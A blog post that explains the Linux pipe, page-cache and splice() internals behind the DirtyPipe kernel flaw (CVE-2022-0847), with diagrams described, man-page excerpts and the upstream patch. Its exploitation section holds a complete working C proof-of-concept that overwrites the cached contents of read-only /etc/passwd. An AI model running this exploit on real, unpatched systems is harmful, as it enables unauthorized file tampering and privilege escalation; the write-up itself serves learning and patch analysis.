DirtyPipe-CVE-2022-0847
by 0xnull007
One of my friends, stdnoerr, wrote a blog about his N-day research on DirtyPipe (CVE-2022-0847). As a noob in kernel exploitation, I realized that I should be familiar with some Linux kernel internals to fully understand his blog. So I decided to explore those internals and write about my journey so others like me could benefit. This post covers only the internals necessary to understand the DirtyPipe vulnerability and its exploitation. We’ll go through the important kernel structures in sequence and then merge them at the end to get the complete picture.
Pipe
The first and most important kernel concept/structure involved in this vulnerability is a pipe. A pipe is a unidirectional inter-process communication (IPC) mechanism found in UNIX-like operating systems. In essence, a pipe is a buffer in kernel space that processes access through file descriptors. You might have used it in your shell commands like:
cat /proc/cpuinfo | grep "address size"
Here, the | operator creates a pipe (a buffer in kernel space). The output of cat is written into this pipe, and the input of grep is read from the same pipe. Such a pipe can be created programmatically using the syscall pipe(), which returns two file descriptors: one for reading and the other for writing.
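To make the pipe() call concrete, here is a minimal sketch that pushes a short message through a fresh pipe and reads it back. The helper name pipe_roundtrip is my own invention for illustration, and it assumes the message is small enough to fit in the pipe without blocking.

```c
#include <assert.h>
#include <string.h>
#include <unistd.h>

/* Hypothetical helper (not from any library): write msg into a new pipe and
 * read it back. Returns the number of bytes read, or -1 on error.
 * Assumes msg is short, so the write cannot block on a full pipe. */
ssize_t pipe_roundtrip(const char *msg, char *out, size_t outsz)
{
    int pipefd[2];                 /* [0] = read end, [1] = write end */
    size_t len = strlen(msg);
    ssize_t n = -1;

    assert(outsz > len);           /* room for the data plus a terminator */

    if (pipe(pipefd) == -1)
        return -1;

    if (write(pipefd[1], msg, len) == (ssize_t)len) {
        n = read(pipefd[0], out, outsz - 1);
        if (n >= 0)
            out[n] = '\0';         /* read() does not null-terminate */
    }

    close(pipefd[0]);
    close(pipefd[1]);
    return n;
}
```

Calling pipe_roundtrip("hello", out, sizeof out) should hand back the same five bytes that were written.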
In Linux, every file is represented by a special data structure called an inode, which stores important information about the file (such as its type, size, and permissions). Pipes in the Linux kernel are built on top of the virtual filesystem (VFS). When you create a pipe, the two file descriptors you get point to two pseudo files with different permissions — one read-only and the other write-only — but both share a single inode. This inode has a field called i_pipe, which points to a kernel structure named pipe_inode_info. This structure is what the kernel uses to manage the actual metadata of a pipe.
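The shared inode can be observed from user space. The sketch below compares what fstat() reports for two descriptors; same_pipe_inode is a hypothetical helper of mine, and the expectation that both ends of one pipe report the same inode number is based on my understanding of Linux, not something guaranteed on every platform.

```c
#include <assert.h>
#include <sys/stat.h>
#include <unistd.h>

/* Hypothetical helper: returns 1 if both descriptors are FIFOs backed by the
 * same inode, 0 if not, and -1 if fstat() fails. */
int same_pipe_inode(int fd_a, int fd_b)
{
    struct stat a, b;

    assert(fd_a >= 0 && fd_b >= 0);

    if (fstat(fd_a, &a) == -1 || fstat(fd_b, &b) == -1)
        return -1;

    return S_ISFIFO(a.st_mode) && S_ISFIFO(b.st_mode) &&
           a.st_dev == b.st_dev && a.st_ino == b.st_ino;
}
```

After pipe(pipefd), same_pipe_inode(pipefd[0], pipefd[1]) should return 1 on Linux, while comparing ends of two different pipes should return 0.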
Key Data Structures
struct pipe_inode_info
- Tracks read/write positions, buffers, and synchronization.
- bufs: an array of struct pipe_buffer, each representing a memory page storing pipe data.
- ring_size: size of the array bufs.
struct pipe_buffer
- page: pointer to the struct page describing where the actual data held by the pipe_buffer is stored.
- offset, len: track where valid data exists in the page.
- ops: operations table (pipe_buf_operations) for managing the buffer.
- flags: per-buffer flags, including PIPE_BUF_FLAG_CAN_MERGE, which matters later in this post.
Operations on a Pipe
Pipe Creation (pipe())
pipe()/pipe2() syscall → do_pipe2() → __do_pipe_flags()
- Allocates a struct pipe_inode_info via alloc_pipe_info().
- Creates two file descriptors (read & write ends) via get_unused_fd_flags().
- Initializes 16 pipe buffers by default (PIPE_DEF_BUFFERS).
Note that each pipe_buffer has one page associated with it, which means the total capacity of the pipe is ring_size * 4096 bytes (assuming 4 KiB pages). A process can get and set this capacity, in bytes, using the fcntl() system call with the F_GETPIPE_SZ and F_SETPIPE_SZ commands, respectively. ring_size is always a power of 2: the kernel rounds the requested byte count up to a power of two (and to at least one page), so asking for three pages' worth of capacity yields four.
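Here is a small sketch of resizing a pipe and reading back what the kernel actually granted. resize_pipe is a hypothetical helper name; F_SETPIPE_SZ and F_GETPIPE_SZ are the real Linux fcntl() commands and need _GNU_SOURCE.

```c
#define _GNU_SOURCE
#include <assert.h>
#include <fcntl.h>
#include <unistd.h>

/* Hypothetical helper: request `bytes` of capacity for a pipe and return the
 * capacity the kernel actually granted, or -1 on error. */
long resize_pipe(int pipe_fd, long bytes)
{
    assert(bytes > 0);

    if (fcntl(pipe_fd, F_SETPIPE_SZ, (int)bytes) == -1)
        return -1;

    /* The granted size may be larger than requested because of rounding. */
    return fcntl(pipe_fd, F_GETPIPE_SZ);
}
```

For example, requesting 3 * sysconf(_SC_PAGESIZE) bytes should come back as a power-of-two size that is at least that large (four pages, if my reading of the rounding is right).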
Writing to a Pipe (write())
write() syscall → vfs_write() → pipe_write().
- If the pipe is full, the writer sleeps until space is available.
- Kernel allocates a page (if needed) and copies data from user space.
- Updates pipe_buffer’s offset, len, and flags.
Reading from a Pipe (read())
read() syscall → vfs_read() → pipe_read().
- If the pipe is empty, the reader sleeps until data arrives.
- Kernel copies data from the pipe_buffer page to user space.
- If the buffer is fully consumed, the page is freed or marked for reuse.
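The full and empty conditions are easier to poke at without sleeping. The sketch below assumes the pipe was created with pipe2(..., O_NONBLOCK), in which case a write to a full pipe or a read from an empty one fails with EAGAIN instead of blocking. Both helper names are hypothetical.

```c
#define _GNU_SOURCE
#include <assert.h>
#include <errno.h>
#include <fcntl.h>
#include <string.h>
#include <unistd.h>

/* Hypothetical helper: write 4096-byte chunks into a non-blocking pipe until
 * the kernel reports it is full. Returns total bytes accepted, or -1. */
long fill_pipe(int wr_fd)
{
    char chunk[4096];
    long total = 0;

    /* On a blocking descriptor this loop would sleep instead of stopping. */
    assert(fcntl(wr_fd, F_GETFL) & O_NONBLOCK);
    memset(chunk, 'A', sizeof chunk);

    for (;;) {
        ssize_t n = write(wr_fd, chunk, sizeof chunk);
        if (n > 0) {
            total += n;
            continue;
        }
        if (n == -1 && errno == EAGAIN)
            return total;          /* pipe is full */
        return -1;                 /* unexpected error */
    }
}

/* Hypothetical helper: returns 1 if a 1-byte read on a non-blocking pipe
 * fails with EAGAIN (the pipe is empty), 0 otherwise. Note that a successful
 * read consumes one byte. */
int empty_read_would_block(int rd_fd)
{
    char c;
    ssize_t n = read(rd_fd, &c, 1);
    return n == -1 && errno == EAGAIN;
}
```

The total returned by fill_pipe() should not exceed what F_GETPIPE_SZ reports for the same pipe.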
The array bufs in struct pipe_inode_info is a circular array (or ring buffer):
- It has a fixed size (defined by ring_size in pipe_inode_info).
- It uses two indices (head and tail) to track where new data is written (head) and where data is read (tail).
- New data is written to bufs[head & (ring_size - 1)] and head is incremented. As ring_size is always a power of 2, masking with ring_size - 1 is equivalent to head % ring_size, so when head reaches ring_size the index wraps around to 0 (hence “circular”).
- When head - tail == ring_size, the pipe is full; new writes block, or fail with EAGAIN if the write end is non-blocking (O_NONBLOCK). Existing data is never overwritten.
- When head == tail, the pipe is empty; reads block until new data arrives.
Here is a pictorial view of what has been discussed so far.
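The head/tail bookkeeping can be modelled in a few lines of user-space C. This is only a toy model of the idea, not kernel code: the struct, the function names and the ring size of 4 are all my own choices.

```c
#include <assert.h>
#include <stdbool.h>

#define RING_SIZE 4u               /* toy value; must be a power of two */
static_assert((RING_SIZE & (RING_SIZE - 1)) == 0, "RING_SIZE must be a power of two");

struct ring {
    unsigned int head;             /* counts slots ever written */
    unsigned int tail;             /* counts slots ever read */
    int slots[RING_SIZE];
};

bool ring_empty(const struct ring *r) { return r->head == r->tail; }
bool ring_full(const struct ring *r)  { return r->head - r->tail >= RING_SIZE; }

/* Store v in the slot selected by masking head, then advance head. */
bool ring_push(struct ring *r, int v)
{
    if (ring_full(r))
        return false;              /* a real pipe would block here */
    r->slots[r->head & (RING_SIZE - 1)] = v;
    r->head++;
    return true;
}

/* Fetch the oldest value from the slot selected by masking tail. */
bool ring_pop(struct ring *r, int *out)
{
    if (ring_empty(r))
        return false;              /* a real pipe would block here */
    *out = r->slots[r->tail & (RING_SIZE - 1)];
    r->tail++;
    return true;
}
```

Note that head and tail only ever grow; the mask is what maps them back into the array, which is why the fifth push in this model lands in slot 0 again.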
Page Cache
The page cache plays an important role in the Dirty Pipe vulnerability, so let’s see what it is and how it works. The page cache is a kernel-managed memory region that stores recently accessed file data and disk blocks in RAM. It can be thought of as a caching layer for file I/O to speed it up.
According to the Linux kernel documentation:
The physical memory is volatile, and the common case for getting data into memory is to read it from files. Whenever a file is read, the data is put into the page cache to avoid expensive disk access on subsequent reads. Similarly, when one writes to a file, the data is placed in the page cache and eventually written to the backing storage device. The written pages are marked as dirty, and when Linux decides to reuse them for other purposes, it makes sure to synchronize the file contents on the device with the updated data. source
The kernel doesn’t just store recently accessed file data in the page cache—it also uses an optimization mechanism called read-ahead, which observes access patterns, predicts which pages you’ll need next, and loads them into memory in advance. So, if you are reading a file sequentially, the kernel will pre-load the remaining pages of that file into memory as well.
Because of this caching layer, if any process on the system (or the kernel itself) requests data from a file that is already cached, the cached data is used instead of accessing the disk. This default behavior can be changed by using the flags (O_DIRECT | O_SYNC) when opening a file. However, in most situations, the cached data is what the kernel, and therefore user processes, actually use.
Whenever a file is opened, the kernel stores its metadata in struct inode. Among that metadata, there is a field named i_mapping, which points to a struct address_space that keeps track of the page cache pages holding that file's contents.
splice() syscall
The splice syscall is part of the zero-copy system calls in the Linux kernel. Zero-copy syscalls allow data to be transferred between kernel objects (such as files, sockets, and pipes) without copying the data into or out of user-space memory.
Let’s make this clearer with a scenario where we want to copy the contents of a file into a pipe. The naive approach would be to open and read the contents of that file into a user buffer and then write that buffer’s contents into a pipe. The following diagram shows the steps involved in this approach:
We can see that to copy the data from a file into a pipe, we first have to copy it into a user-space buffer, which is redundant and costly. The splice syscall eliminates this step by reusing the page cache where the file’s data is already cached. Instead of copying the data from the page cache to a user buffer, it stores a pointer to the cached page in the page field of the pipe_buffer. The following diagram illustrates this:
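For comparison, the naive read-then-write path described above could look roughly like this. copy_file_to_pipe_naive is a hypothetical helper, and to keep the sketch short it handles a single chunk of at most 4096 bytes.

```c
#include <assert.h>
#include <unistd.h>

/* Hypothetical helper: copy up to `len` bytes from a file into a pipe the
 * slow way, bouncing the data through a user-space buffer.
 * Returns the number of bytes written to the pipe, 0 at EOF, or -1. */
ssize_t copy_file_to_pipe_naive(int file_fd, int pipe_wr_fd, size_t len)
{
    char buf[4096];
    ssize_t n;

    assert(len <= sizeof buf);     /* single-chunk sketch only */

    n = read(file_fd, buf, len);               /* kernel -> user buffer */
    if (n <= 0)
        return n;

    return write(pipe_wr_fd, buf, (size_t)n);  /* user buffer -> pipe page */
}
```

Every byte is copied twice here (once into buf, once into a pipe page), and that is exactly the overhead splice() is designed to avoid.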
Let’s see what the man page of the splice syscall says:
SPLICE(2) Linux Programmer's Manual
NAME
splice - splice data to/from a pipe
SYNOPSIS
#define _GNU_SOURCE /* See feature_test_macros(7) */
#include <fcntl.h>
ssize_t splice(int fd_in, off64_t *off_in, int fd_out,
off64_t *off_out, size_t len, unsigned int flags);
DESCRIPTION
splice() moves data between two file descriptors without copying between
kernel address space and user address space. It transfers up to len bytes
of data from the file descriptor fd_in to the file descriptor fd_out,
where one of the file descriptors must refer to a pipe.
The following semantics apply for fd_in and off_in:
* If fd_in refers to a pipe, then off_in must be NULL.
* If fd_in does not refer to a pipe and off_in is NULL, then bytes are read
from fd_in starting from the file offset, and the file offset is adjusted
appropriately.
* If fd_in does not refer to a pipe and off_in is not NULL, then off_in must
point to a buffer specifying the starting offset from which bytes will be
read from fd_in; in this case, the file offset of fd_in is not changed.
Analogous statements apply for fd_out and off_out.
One important thing to note from the description above is that one of the two file descriptors passed to the splice syscall must refer to a pipe. Let’s take a simple example to understand splice() in action.
#define _GNU_SOURCE
#include <fcntl.h>
#include <stdio.h>
#include <unistd.h>

#define TARGET_FILE "./f1"

int main(void) {
    int fd;
    int pipefd[2];
    char buffer[256];
    ssize_t spliced, n = 0;

    // 1. Create pipe and open target file
    if (pipe(pipefd) == -1) {
        perror("pipe");
        return 1;
    }
    if ((fd = open(TARGET_FILE, O_RDONLY)) == -1) {
        perror("open");
        return 1;
    }

    // 2. Splice the file into the pipe (leave room for a terminator)
    spliced = splice(fd, NULL, pipefd[1], NULL, sizeof(buffer) - 1, 0);
    if (spliced < 0) {
        perror("splice");
        close(fd);
        close(pipefd[0]);
        close(pipefd[1]);
        return 1;
    }

    // 3. Read the spliced data back out of the pipe.
    //    Skip the read for an empty file, since it would block forever.
    if (spliced > 0)
        n = read(pipefd[0], buffer, sizeof(buffer) - 1);
    if (n < 0) {
        perror("read");
        return 1;
    }
    buffer[n] = '\0'; // read() does not null-terminate
    printf("Data read from target file: %s\n", buffer);

    close(fd);
    close(pipefd[0]);
    close(pipefd[1]);
    return 0;
}
The above code snippet opens a file f1 and splices it into the pipe, whose buffer then refers to the page cache of f1. We can then perform a read operation on the pipe to read the file contents.
Writing to a Pipe
Understanding how data is written to a pipe is essential to understanding and exploiting this vulnerability. When a process writes data into a pipe, the kernel eventually calls the pipe_write() function. This function is responsible for copying data from user space into one or more pipe buffers, the circular array that forms the core of every pipe. When the pipe is not empty, pipe_write() first looks at the most recently written pipe buffer (the slot just before head in pipe->bufs, not the tail) and tries to merge the new data into it. So, if there is space left in that buffer's page, new data is appended there, and only the remainder goes into fresh slots. However, this is problematic with the zero-copy concept. As mentioned, a zero-copy operation stores a reference to the file’s page instead of copying it. If a page reference is stored this way, the pipe must prevent that page from being modified, or it would have to copy the whole page instead of just the pointer. Why the kernel must prevent modification will become clear shortly. Therefore, a flag was introduced to specify whether new data may be appended to a buffer.
This merge decision is made based on the following condition (simplified):
if (buf->flags & PIPE_BUF_FLAG_CAN_MERGE) {
// append new data into existing pipe buffer
}
The PIPE_BUF_FLAG_CAN_MERGE flag indicates whether the existing pipe_buffer can safely accept more data, meaning the new data can be written directly into the same underlying page without breaking isolation or corrupting shared memory.
- For anonymous pipes (normal cases), this flag is set to 1 by default.
- For pipe buffers backed by a file’s page cache, this flag must be set to 0, since those pages might be shared between multiple processes or files (read-only pages, for instance).
Now, answering the question above: suppose process A reads f1.txt, and the file’s contents are loaded into the page cache. If process B then uses splice() to move data from f1.txt into a pipe without copying, the pipe buffer will point directly to the same cached page that process A populated. If process B subsequently writes into that pipe buffer, it will overwrite the shared cached page, and by extension the actual file contents, even if that file was read-only. To protect against this, the pipe implementation uses a flag called PIPE_BUF_FLAG_CAN_MERGE. For buffers backed by a file’s page cache, this flag must be cleared (set to 0), which prevents future writes from being merged into that buffer.
Vulnerability
To pinpoint what went wrong, let’s trace the splice(file → pipe) call path within the Linux kernel. The journey begins at sys_splice(), the system call entry point. It primarily resolves user-supplied file descriptors into struct fd objects and then invokes __do_splice(), which looks up the corresponding struct pipe_inode_info for the pipe, copies the file offset (if any) from user space into kernel space, and then calls do_splice(). do_splice() determines the splice direction (e.g., file → pipe, pipe → file, or pipe → pipe) and dispatches to the appropriate helper function based on the source and destination types.
In the Dirty Pipe case, data is being spliced from a file to a pipe, so splice_file_to_pipe() is used. This function invokes the file’s splice_read callback defined in its struct file_operations. For regular files, this callback points to generic_file_splice_read(), which internally calls the standard read path (read_iter() → generic_file_read_iter()).
generic_file_read_iter() uses the page cache to serve reads efficiently. Inside, it calls filemap_read(), which fetches the file’s backing pages from the page cache and hands them off to copy_page_to_iter(). After performing necessary checks, execution reaches copy_page_to_iter_pipe(), where the current pipe buffer slot is obtained from the pipe’s buffer array and the page cache page is attached to it directly, without copying any data.
This means the pipe buffer now holds a reference to the same struct page that backs the file’s page cache. The following diagram illustrates this entire flow.
In the copy_page_to_iter_pipe() function, the following code snippet copies the page reference and updates the pipe_buffer struct. The important thing to note is that the flags member of buf, which contains the PIPE_BUF_FLAG_CAN_MERGE bit, is never reset to 0 here, even though clearing it is what would prevent future writes from being merged into this buffer.
buf->ops = &page_cache_pipe_buf_ops;
get_page(page);
buf->page = page;
buf->offset = offset;
buf->len = bytes;
The Dirty Pipe vulnerability occurred because copy_page_to_iter_pipe() could leave pipe_buffer->flags uninitialized; a stale nonzero value there could incorrectly indicate that merging was allowed, permitting writes that modified file-backed cache pages. Now, to trigger this vulnerability, we must splice into a pipe buffer whose PIPE_BUF_FLAG_CAN_MERGE is already set. We can set this flag simply by writing into an anonymous (normal) pipe, because such a write goes through the pipe_write() code path, which sets that flag on the buffers it allocates. Reading from the pipe afterwards does not unset the flag.
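The stale-flag lifecycle can be reproduced with a toy user-space model of a one-slot pipe. None of this is kernel code: the struct, the function names and the 16-byte "page" are made up for illustration, and MODEL_CAN_MERGE merely stands in for PIPE_BUF_FLAG_CAN_MERGE. The patched parameter models a splice path that clears the flags.

```c
#include <assert.h>
#include <stdbool.h>
#include <string.h>

#define MODEL_PAGE_SIZE 16u
#define MODEL_CAN_MERGE 0x10u      /* stand-in for PIPE_BUF_FLAG_CAN_MERGE */

struct model_buf {
    char *page;                    /* backing page: anonymous or "page cache" */
    unsigned int offset;           /* start of valid data in the page */
    unsigned int len;              /* valid bytes; 0 means the slot is free */
    unsigned int flags;
};

/* Model of a write into a one-slot pipe: merge if allowed, else use a fresh
 * anonymous page, else report that a real pipe would block. */
bool model_write(struct model_buf *b, char *anon_page, const char *data, unsigned int n)
{
    unsigned int end = b->offset + b->len;

    assert(n <= MODEL_PAGE_SIZE);
    if (b->len != 0) {
        if ((b->flags & MODEL_CAN_MERGE) && end + n <= MODEL_PAGE_SIZE) {
            memcpy(b->page + end, data, n);    /* append into the existing page */
            b->len += n;
            return true;
        }
        return false;              /* slot occupied and not mergeable */
    }
    memcpy(anon_page, data, n);
    b->page = anon_page;
    b->offset = 0;
    b->len = n;
    b->flags = MODEL_CAN_MERGE;    /* normal writes mark the buffer mergeable */
    return true;
}

/* Model of a read that drains the slot: the flags are left untouched. */
void model_drain(struct model_buf *b)
{
    b->len = 0;
}

/* Model of splice(file -> pipe): attach the cached page by reference.
 * Only the patched variant resets the flags. */
void model_splice(struct model_buf *b, char *cache_page,
                  unsigned int off, unsigned int n, bool patched)
{
    b->page = cache_page;
    b->offset = off;
    b->len = n;
    if (patched)
        b->flags = 0;
}
```

Running write, drain, splice, write against this model with patched set to false lets the last write land in the "cached" page right after the spliced byte; with patched set to true the same write is refused.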
Exploitation
To exploit this vulnerability, we need to allocate a pipe and open a file to which we have only read-only access, to test whether we can actually write to it. Before splicing that file, we must ensure that the pipe’s PIPE_BUF_FLAG_CAN_MERGE flag is set. To set that flag, we will write to the pipe and then read from it. This drains the pipe and frees the pages, but the flag remains set.
By default, a pipe has 16 buffers and each can hold 4096 bytes. For simplicity, we can change the pipe size to reduce the number of pipe buffers to 1, which helps us reach the goal faster. One important thing to note is that draining this single pipe buffer completely is mandatory before splicing a file into it.
#define _GNU_SOURCE
#include <fcntl.h>
#include <stdio.h>
#include <unistd.h>

#define TARGET_FILE "/etc/passwd"

int main() {
    int fd;
    int pipefd[2];
    char buffer[4096];

    // 1. Create pipe and open target file
    if ((fd = open(TARGET_FILE, O_RDONLY)) == -1) {
        perror("open");
        return 1;
    }
    if (pipe(pipefd) == -1) {
        perror("pipe");
        return 1;
    }

    // 2. Shrink the pipe to 4096 bytes, fill the pipe and then drain it
    fcntl(pipefd[0], F_SETPIPE_SZ, sizeof(buffer));
    write(pipefd[1], buffer, sizeof(buffer));
    read(pipefd[0], buffer, sizeof(buffer));

    return 0;
}
Since the path to the vulnerable function copy_page_to_iter_pipe() is via splice and goes through splice_file_to_pipe(), we will perform a splice from the target file to the pipe. Because copy_page_to_iter_pipe() will obtain the file’s cached page, the buffer’s page will be replaced with the file’s. Subsequent writes to the pipe should modify the file’s page, even though the file is read-only. The splice size will be 1, the smallest possible value that triggers the vulnerability.
// 3. Trigger the vulnerability via splice
if (splice(fd, NULL, pipefd[1], NULL, 1, 0) < 0) {
    perror("splice");
    close(fd);
    close(pipefd[0]);
    close(pipefd[1]);
    return 1;
}
At this point, the file’s cached page is being used as the pipe_buffer’s backing page. Now, writing to the pipe should overwrite the file’s content. The following is the complete proof-of-concept.
#define _GNU_SOURCE
#include <fcntl.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>

#define TARGET_FILE "/etc/passwd"

int main(void) {
    int fd;
    int pipefd[2];
    char buffer[4096];
    ssize_t n;

    // 1. Create pipe and open target file (read-only access is enough)
    if ((fd = open(TARGET_FILE, O_RDONLY)) == -1) {
        perror("open");
        return 1;
    }
    if (pipe(pipefd) == -1) {
        perror("pipe");
        return 1;
    }

    // 2. Shrink the pipe to 4096 bytes, fill the pipe and then drain it.
    //    This leaves PIPE_BUF_FLAG_CAN_MERGE set on the single pipe buffer.
    memset(buffer, 'A', sizeof(buffer));
    fcntl(pipefd[0], F_SETPIPE_SZ, sizeof(buffer));
    write(pipefd[1], buffer, sizeof(buffer));
    read(pipefd[0], buffer, sizeof(buffer));

    // 3. Trigger the vulnerability via splice (1 byte from file offset 0)
    if (splice(fd, NULL, pipefd[1], NULL, 1, 0) < 0) {
        perror("splice");
        close(fd);
        close(pipefd[0]);
        close(pipefd[1]);
        return 1;
    }

    // 4. Overwrite the target file's cached page, starting at file offset 1
    //    (right after the spliced byte)
    write(pipefd[1], "0xnull007", 9);

    // 5. Read the file back from the start to check the result
    lseek(fd, 0, SEEK_SET);
    n = read(fd, buffer, 60);
    if (n < 0) {
        perror("read");
        return 1;
    }
    buffer[n] = '\0'; // Null-terminate the buffer
    printf("Data read from target file: %s\n", buffer);
    return 0;
}
Limitations
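DirtyPipe has a few limitations:
- It cannot overwrite the first byte of a page: at least one byte must be spliced into the pipe first, and the write starts right after it.
- It cannot write more than PAGE_SIZE - 1 bytes at once, because the write cannot cross a page boundary.
- It cannot overwrite memory pages; the data to be overwritten must be on disk.
- It cannot write more contents than the file’s original size.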
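The offset-related limitations above can be turned into a small range check. This is my own sketch, under the assumption that the overwrite begins at the file offset where the splice ended; dirtypipe_range_ok is a hypothetical helper, and integer overflow of off + len is ignored for brevity.

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>

/* Hypothetical helper: can `len` bytes starting at file offset `off` be
 * overwritten in a single shot, given the limitations listed above? */
bool dirtypipe_range_ok(size_t off, size_t len, size_t file_size, size_t page_size)
{
    size_t page_end;

    /* page_size must be a nonzero power of two for the masking below. */
    assert(page_size != 0 && (page_size & (page_size - 1)) == 0);

    if (len == 0)
        return false;
    if ((off & (page_size - 1)) == 0)
        return false;              /* first byte of a page: it has to be spliced */
    if (off + len > file_size)
        return false;              /* the file cannot grow */

    page_end = (off | (page_size - 1)) + 1;    /* first offset of the next page */
    if (off + len > page_end)
        return false;              /* the write cannot cross a page boundary */

    return true;
}
```

With 4096-byte pages, offset 1 with length 4095 passes the check, while offset 0 or offset 4096 is rejected regardless of length.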
Patch
Now, let’s see the patch commit for this vulnerability. We can see that they initialized the flags member to 0 in both functions where it wasn’t initialized. This means that whenever a file is spliced into the pipe, its PIPE_BUF_FLAG_CAN_MERGE flag will be set to 0, preventing it from being overwritten.
diff --git a/lib/iov_iter.c b/lib/iov_iter.c
index b0e0acdf96c15e..6dd5330f7a9957 100644
--- a/lib/iov_iter.c
+++ b/lib/iov_iter.c
@@ -414,6 +414,7 @@ static size_t copy_page_to_iter_pipe(struct page *page, size_t offset, size_t by
return 0;
buf->ops = &page_cache_pipe_buf_ops;
+ buf->flags = 0;
get_page(page);
buf->page = page;
buf->offset = offset;
@@ -577,6 +578,7 @@ static size_t push_pipe(struct iov_iter *i, size_t size,
break;
buf->ops = &default_pipe_buf_ops;
+ buf->flags = 0;
buf->page = page;
buf->offset = 0;
buf->len = min_t(ssize_t, left, PAGE_SIZE);